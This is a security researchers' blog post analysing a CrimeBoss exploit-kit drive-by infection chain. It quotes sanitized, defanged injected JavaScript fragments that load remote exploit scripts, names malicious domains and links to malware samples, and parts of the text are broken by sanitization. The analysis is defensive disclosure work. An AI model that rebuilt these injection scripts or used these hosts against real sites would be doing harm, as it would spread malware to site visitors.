Sunday, January 27, 2013

Hulk teams up with the Malware Crusaders to smash The CrimeBoss! (infector


This post is made 100% by one of our dedicated friend @Hulk_Crusader as the success story of a collaboration in fighting malware infector CrimeBoss. Thank's for Hulk for the hard work contributing his writing in our blog! Some of the analysis is still under-going so the details will be added regularly.
On a cold January night we find The Hulk passing time surfing the internet when he encounters what appears to be a CrimeBoss Exploit Kit Javascript injection on editorialconecta[.]com: Why can't puny malware just leave Hulk alone????!!! The script on checks if Java is enabled(slightly sanitized with <):
    <script src="h00p://abrahamspath,">
    </script>'); }
If Java is enabled you are sent via a 302 redirect to
where again a check for Java is made (slightly sanitized with <):
    document.write('<sc' + 'ri' + 'pt src=
    "h00p://boyssuitsonline,com/jex/index.php?setup=d&s=2&r=' + Math.floor(100000 + 
    (Math.random()*999999 + 1)) + '" type="text/javascript" 
    </sc' + 'ri' + 'pt>');
Finally the victim is presented with the actual landing page, Landing page sample is here -->>[PASTEBIN] The landing page again checks if Java is enabled.

[NEW] Analysis of Landing Page & Jars exploit used

I analyzed how the exploit worked, and noted it down. Is a bit long so I wrote it in seperate post page-->>[HERE] What is it with these moronz?? A malware PE binary rh.exe is downloaded from,br/app/ if any of the Java applets successfully exploit the victim. See: VirusTotal analysis -->>[HERE] analysis -->>[HERE] Network analysis shows a GET request for Instal.teaz from sonhodoseu.dominiotemporario,com/fugi/ This is actually another executable and appears to be a banker trojan. See: VirusTotal analysis -->>[HERE] analysis -->>[HERE]

Infection Scheme

Below we added the infection scheme graph: RRRRAAAAAAARGGHHHHH!!! The Hulk and Malware Crusaders smash the evil CrimeBoss Kit but is this the last we've seen of this villain?
Only time will tell. But bad guyz beware: The Hulk and The Malware Crusaders are always looking for you and you will never know when we decide to smash you!!

*),, and are victimized sites & in some cases also, to include infectious code to spread malware to visitors.
PoC is as per below: And so many other infections:

Research, Sources & Samples

Samples as per above sample pic, can be received here -->>[MEDIAFIRE] Recent Infection URL of this Exploit Kit is here -->>[HERE] Similar analysis in Japanese --->>[HERE] The Regex to search infection hint: Written by: @Hulk_Crusader(main) & @unixfreaxjp (reference, analysis)